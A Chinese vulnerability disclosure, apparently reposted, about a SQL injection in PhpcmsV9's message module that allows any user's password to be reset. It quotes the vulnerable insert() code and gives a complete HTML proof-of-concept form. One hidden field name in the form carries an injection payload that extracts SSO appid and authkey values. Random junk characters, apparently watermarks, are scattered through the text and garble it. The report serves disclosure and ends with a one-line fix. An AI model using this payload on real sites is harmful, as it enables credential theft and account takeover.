PhpcmsV9 SQL注射修改任意用户密码漏洞

admin

简要描述：
4 s- a3 }2 N9 o# M4 k9 Q# a
第二发如约来到，感谢大家的关注，在第二发中使用了一个无限制的SQL注射，最终目的可以修改任意用户密码，建议确认安全危害等级为高。

2 O; }. V' C$ C1 Y: W2 n  m/ B明天再更新下一个漏洞。
5 z: m! L8 A$ S% t2 B; i* L% J详细说明：
5 S9 F) X, p8 T( U% O在/phpcms9/phpcms/modules/message/index.php中有代码如下：

$messageid = $this->message_db->insert($_POST['info'],true);

6 K' n8 m# ^' }5 v" {% S/ y/ g" U
+ F6 |* |6 O* k5 F9 V$ |: v8 Yinsert方法是key value的，代码如下：
' J6 p6 m: W" L$ P& l6 X
; P7 l2 R5 [( U$ Xpublic function insert($data, $table, $return_insert_id = false, $replace = false) {
                if(!is_array( $data ) || $table == '' || count($data) == 0) {
: k- c0 c( z2 ~2 ?6 I4 k                        return false;
                }
5 c5 U1 @' i- l' q2 K% ^% v               
, v+ C7 J1 G) d( Z& N1 D' h- P% r                $fielddata = array_keys($data);
                $valuedata = array_values($data);
                array_walk($fielddata, array($this, 'add_special_char'));
                array_walk($valuedata, array($this, 'escape_string'));
               
                $field = implode (',', $fielddata);
8 i8 d- f- H" m1 v% C# f                $value = implode (',', $valuedata);

1 l' \2 |5 }& |" a9 |  g                $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
& O+ z+ Q4 j  C                $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
                $return = $this->execute($sql);
                return $return_insert_id ? $this->insert_id() : $return;
) U3 O* G# r3 X9 x        }


嗯，很遗憾的是
$ G( l/ R% ]2 d4 k
( Z; T+ @7 B0 h% @( P+ \" {array_walk($fielddata, array($this, 'add_special_char'));
; o& m$ t* i; c2 L. Y* H

中并没有对key做任何的过滤，所以，第一段提到的代码导致了一个SQL注射漏洞 ：（。

到此，为了poc一下，我读取了我本地的authkey，接下来我已经可以重置任意用户密码了，后面的事情我就没有演示了。

8 c" t# C0 r( O5 g  _2 D漏洞证明：
4 D& \% o" p) f8 l! W9 y读出了phpsso_server的appid和authkey，然后可以调用client.class.php中的ps_member_edit函数修改任意用户密码。

; ~) i: s2 T* w' p; Q, H) U9 }
8 {& K/ a5 L% o9 s! G表单如下：用户名什么的得自己改一改。
<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
. y* R" I. G0 n  Q( l4 K8 C<table width="100%" cellspacing="0" class="table_form">
2 K/ M! _8 k4 W<tr>
<th>标 题：</th>
<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh"  class="input-text"/></td>
</tr>
<tr>
<th>内 容：</th>
<td><textarea name="info[content]"  id="con" rows="5" cols="50"></textarea></td>
' m# E! a( Q7 H' w4 n</tr>
<input type="hidden" name="info[replyid]" value="2" />
* j9 Y2 J# m$ t' c, L8 L<input type="hidden" name="info[send_to_id]" value="cc" />
<input type="hidden" name="info[send_from_id]" value="hh">
: l& A' k" D+ E. d; y6 d  F<!-- 漏洞的利用重点在这里开始 -->
1 C( X4 r! r; |3 v8 ^, m$ g<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />
6 f0 v3 b# d1 X6 ?3 X<!-- 漏洞的利用重点在这里结束 -->
<tr>
<th>验证码：</th>
# ~( ?/ N4 ^+ O2 Z( m9 e<td><input name="code" type="text" id="code" size="10"  class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
, H% V5 X# N" h2 N. E3 w+ j</tr>
  C( P: H$ `) j, ^& o7 u<tr>
<td></td>
* M1 O0 [" h0 A' @! \6 B4 G<td colspan="2"><label>
5 ^4 [. \" o! B5 ^! A& H. K9 T0 K1 m: b<input type="submit" name="dosubmit" id="dosubmit" value="确 定" class="button"/>
1 K; L) D) \2 N: [7 L</label></td>
5 n0 G8 R  d# D: q' t* M</tr>
7 G( w0 L4 M) W$ J' B1 u</table>
) |+ e% K+ K5 I; c% F</form>
8 B. l5 T* o. p在add_special_char函数内对key做过滤就可以了。

, U& v( j, v- K; f; t